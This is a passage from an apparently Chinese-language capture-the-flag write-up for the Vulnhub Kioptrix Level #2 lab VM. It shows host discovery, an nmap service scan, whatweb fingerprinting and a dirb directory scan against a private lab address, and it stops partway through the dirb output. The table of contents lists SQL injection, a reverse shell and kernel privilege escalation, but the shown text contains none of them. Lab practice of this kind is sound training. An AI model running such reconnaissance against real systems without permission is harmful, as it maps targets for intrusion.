vuInhub靶场实战系列--Kioptrix Level #2

news2024/12/25 9:29:16

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

目录

  • 免责声明
  • 前言
  • 一、环境配置
    • 1.1 靶场信息
    • 1.2 靶场配置
  • 二、信息收集
    • 2.1 主机发现
      • 2.1.1 netdiscover
      • 2.1.2 nmap主机扫描
      • 2.1.3 arp-scan主机扫描
    • 2.2 端口扫描
    • 2.3 指纹识别
    • 2.4 目录扫描
      • 2.4.1 dirb目录扫描
      • 2.4.2 dirsearch目录扫描
    • 2.5 漏洞切入点
      • 2.5.1 访问登录页
      • 2.5.2 访问manual页
      • 2.5.3 nikto
      • 2.5.4 sql注入
        • 2.5.4.1 sqlmap
        • 2.5.4.2 sql注入
  • 三、渗透测试
    • 3.1 尝试注入命令
      • 3.1.1 id
      • 3.1.2 passwd
    • 3.2 反弹shell
      • 3.2.1 kali监听端口
      • 3.2.2 命令注入
    • 3.3 系统提权
      • 3.3.1 系统信息
      • 3.3.2 发行版本
      • 3.3.3 漏洞搜索
      • 3.3.4 脚本文件下载
      • 3.3.5 查看脚本
      • 3.3.6 kali开启http服务
      • 3.3.7 上传脚本
      • 3.3.8 编译并执行脚本
    • 3.4 修改密码
    • 3.5 ssh登录
  • 渗透总结
  • 参考文章


前言

今日测试内容渗透Kioptrix Level #2靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。

Description
Back to the Top
KIOPTRIX VM IMAGE CHALLENGES:
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
This is the second release of #2. First release had a bug in it with the web application
2012/Feb/09: Re-releases
2011/Feb/11: Original Release
Checksum

  • Original MD5: 987FFB98117BDEB6CA0AAC6EA22E755D
  • Original SHA1: 7A0EA0F414DFA0E05B7DF504F21B325C6D3CC53B
  • Re-release MD5: 987FFB98117BDEB6CA0AAC6EA22E755D
  • Re-release SHA1: 7A0EA0F414DFA0E05B7DF504F21B325C6D3CC53B

一、环境配置

1.1 靶场信息

官方链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
发布日期2011年2月11日
靶场大小761MB
作者Kioptrix
系列Kioptrix
难度★☆☆☆☆

1.2 靶场配置

  • 渗透测试环境配置,请参考作者前面的内容vuInhub靶场实战系列-DC-2实战
  • 【解决办法】- 靶机导入VMware后无法自动获取IP地址
  • 建议将攻击机(kali)的网络模式设置为【桥接模式

二、信息收集

2.1 主机发现

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                    
                                                                                                                                                                                                                                  
 10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 600                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.9     ae:d5:7e:a8:51:6a      3     180  Unknown vendor                                                                                                                                                                 
 192.168.1.10    00:0c:29:53:19:4c      1      60  VMware, Inc.                                                                                                                                                                   
 192.168.1.8     22:cb:7f:9b:2c:c1      1      60  Unknown vendor                                                                                                                                                                 
 192.168.1.1     a0:54:f9:b3:23:54      5     300  Unknown vendor                                                                     

2.1.2 nmap主机扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 09:57 EDT
Nmap scan report for 192.168.1.6
Host is up (0.079s latency).
MAC Address: 72:41:2D:54:20:9C (Unknown)
Nmap scan report for 192.168.1.8
Host is up (0.066s latency).
MAC Address: 22:CB:7F:9B:2C:C1 (Unknown)
Nmap scan report for 192.168.1.9
Host is up (0.00027s latency).
MAC Address: AE:D5:7E:A8:51:6A (Unknown)
Nmap scan report for 192.168.1.10
Host is up (0.00028s latency).
MAC Address: 00:0C:29:53:19:4C (VMware)
Nmap scan report for 192.168.1.111
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.34 seconds
                                                   

2.1.3 arp-scan主机扫描

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.9	ae:d5:7e:a8:51:6a	(Unknown: locally administered)
192.168.1.10	00:0c:29:53:19:4c	VMware, Inc.
192.168.1.6	72:41:2d:54:20:9c	(Unknown: locally administered)
192.168.1.8	22:cb:7f:9b:2c:c1	(Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.348 seconds (109.03 hosts/sec). 4 responded


综上所述的三种扫描方式,获得靶机信息
IP地址:192.168.1.10
MAC地址:00:0c:29:53:19:4c

2.2 端口扫描

```bash
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix_Level#2 192.168.1.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 10:00 EDT
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|_  100000  2            111/udp   rpcbind
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2024-06-09T10:53:50+00:00; -3h09m25s from scanner time.
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
3306/tcp open  mysql?
MAC Address: 00:0C:29:53:19:4C (VMware)

Host script results:
|_clock-skew: -3h09m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.63 seconds

综上所述,获得靶机开放的端口信息:
22端口:ssh服务
80端口:http服务
443端口:ssl
631端口:ipp服务
3306端口:mysql服务

2.3 指纹识别

└─# whatweb -v 192.168.1.10 
WhatWeb report for http://192.168.1.10
Status    : 200 OK
Title     : <None>
IP        : 192.168.1.10
Country   : RESERVED, ZZ

Summary   : Apache[2.0.52], HTTPServer[CentOS][Apache/2.0.52 (CentOS)], PasswordField[psw], PHP[4.3.9], X-Powered-By[PHP/4.3.9]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.0.52 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : CentOS
	String       : Apache/2.0.52 (CentOS) (from server string)

[ PHP ]
	PHP is a widely-used general-purpose scripting language 
	that is especially suited for Web development and can be 
	embedded into HTML. This plugin identifies PHP errors, 
	modules and versions and extracts the local file path and 
	username if present. 

	Version      : 4.3.9
	Google Dorks: (2)
	Website     : http://www.php.net/

[ PasswordField ]
	find password fields 

	String       : psw (from field name)

[ X-Powered-By ]
	X-Powered-By HTTP header 

	String       : PHP/4.3.9 (from x-powered-by string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sun, 09 Jun 2024 11:28:41 GMT
	Server: Apache/2.0.52 (CentOS)
	X-Powered-By: PHP/4.3.9
	Content-Length: 667
	Connection: close
	Content-Type: text/html; charset=UTF-8


获得一些关键信息;
Apache[2.0.52], HTTPServer[CentOS][Apache/2.0.52 (CentOS)], PasswordField[psw], PHP[4.3.9], X-Powered-By[PHP/4.3.9]

2.4 目录扫描

2.4.1 dirb目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.10/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jun  9 10:10:29 2024
URL_BASE: http://192.168.1.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.10/ ----
+ http://192.168.1.10/cgi-bin/ (CODE:403|SIZE:288)                                                                                                                                                                                
+ http://192.168.1.10/index.php (CODE:200|SIZE:667)                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/                                                                                                                                                                                        
+ http://192.168.1.10/usage (CODE:403|SIZE:285)                                                                                                                                                                                   
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ ----
==> DIRECTORY: http://192.168.1.10/manual/de/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/developer/                                                                                                                                                                              
==> DIRECTORY: http://192.168.1.10/manual/en/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/faq/                                                                                                                                                                                    
==> DIRECTORY: http://192.168.1.10/manual/fr/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/howto/                                                                                                                                                                                  
==> DIRECTORY: http://192.168.1.10/manual/images/                                                                                                                                                                                 
+ http://192.168.1.10/manual/index.html (CODE:200|SIZE:7234)                                                                                                                                                                      
==> DIRECTORY: http://192.168.1.10/manual/ja/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ko/                                                                                                                                                                                     
+ http://192.168.1.10/manual/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                        
==> DIRECTORY: http://192.168.1.10/manual/misc/                                                                                                                                                                                   
==> DIRECTORY: http://192.168.1.10/manual/mod/                                                                                                                                                                                    
==> DIRECTORY: http://192.168.1.10/manual/programs/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ru/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ssl/                                                                                                                                                                                    
==> DIRECTORY: http://192.168.1.10/manual/style/                                                                                                                                                                                  
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/ ----
+ http://192.168.1.10/manual/de/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/de/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/de/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/de/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/de/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/de/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/de/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/de/index.html (CODE:200|SIZE:7317)                                                                                                                                                                   
+ http://192.168.1.10/manual/de/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/de/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/de/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/de/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/de/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/de/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/de/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/de/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/de/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/developer/ ----
+ http://192.168.1.10/manual/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                            
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/ ----
+ http://192.168.1.10/manual/en/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/en/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/en/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/en/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/en/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/en/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/en/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/en/index.html (CODE:200|SIZE:7234)                                                                                                                                                                   
+ http://192.168.1.10/manual/en/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/en/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/en/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/en/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/en/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/en/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/en/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/en/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/en/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/faq/ ----
+ http://192.168.1.10/manual/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                                  
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/ ----
+ http://192.168.1.10/manual/fr/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/fr/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/fr/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/fr/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/fr/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/fr/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/fr/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/fr/index.html (CODE:200|SIZE:7234)                                                                                                                                                                   
+ http://192.168.1.10/manual/fr/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/fr/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/fr/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/fr/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/fr/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/fr/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/fr/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/fr/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/fr/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/howto/ ----
+ http://192.168.1.10/manual/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                                
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/ ----
+ http://192.168.1.10/manual/ja/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ja/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/ja/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ja/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/ja/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ja/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ja/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/ja/index.html (CODE:200|SIZE:7227)                                                                                                                                                                   
+ http://192.168.1.10/manual/ja/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ja/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ja/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ja/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/ja/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ja/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/ja/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ja/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ja/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/ ----
+ http://192.168.1.10/manual/ko/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/ko/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/ko/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ko/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/ko/index.html (CODE:200|SIZE:6954)                                                                                                                                                                   
+ http://192.168.1.10/manual/ko/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ko/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/ko/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ko/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ko/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/misc/ ----
+ http://192.168.1.10/manual/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                                 
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/mod/ ----
+ http://192.168.1.10/manual/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                                 
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/programs/ ----
+ http://192.168.1.10/manual/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/ ----
+ http://192.168.1.10/manual/ru/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/ru/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/ru/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ru/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/ru/index.html (CODE:200|SIZE:7277)                                                                                                                                                                   
+ http://192.168.1.10/manual/ru/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ru/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/ru/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ru/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ru/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ssl/ ----
+ http://192.168.1.10/manual/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                                  
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/developer/ ----
+ http://192.168.1.10/manual/de/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/faq/ ----
+ http://192.168.1.10/manual/de/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/howto/ ----
+ http://192.168.1.10/manual/de/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/misc/ ----
+ http://192.168.1.10/manual/de/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/mod/ ----
+ http://192.168.1.10/manual/de/mod/index.html (CODE:200|SIZE:13561)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/programs/ ----
+ http://192.168.1.10/manual/de/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/ssl/ ----
+ http://192.168.1.10/manual/de/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/developer/ ----
+ http://192.168.1.10/manual/en/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/faq/ ----
+ http://192.168.1.10/manual/en/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/howto/ ----
+ http://192.168.1.10/manual/en/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/misc/ ----
+ http://192.168.1.10/manual/en/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/mod/ ----
+ http://192.168.1.10/manual/en/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/programs/ ----
+ http://192.168.1.10/manual/en/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/ssl/ ----
+ http://192.168.1.10/manual/en/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/developer/ ----
+ http://192.168.1.10/manual/fr/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/faq/ ----
+ http://192.168.1.10/manual/fr/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/howto/ ----
+ http://192.168.1.10/manual/fr/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/misc/ ----
+ http://192.168.1.10/manual/fr/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/mod/ ----
+ http://192.168.1.10/manual/fr/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/programs/ ----
+ http://192.168.1.10/manual/fr/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/ssl/ ----
+ http://192.168.1.10/manual/fr/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/developer/ ----
+ http://192.168.1.10/manual/ja/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/faq/ ----
+ http://192.168.1.10/manual/ja/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/howto/ ----
+ http://192.168.1.10/manual/ja/howto/index.html (CODE:200|SIZE:5607)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/misc/ ----
+ http://192.168.1.10/manual/ja/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/mod/ ----
+ http://192.168.1.10/manual/ja/mod/index.html (CODE:200|SIZE:13298)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/programs/ ----
+ http://192.168.1.10/manual/ja/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/ssl/ ----
+ http://192.168.1.10/manual/ja/ssl/index.html (CODE:200|SIZE:3957)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/developer/ ----
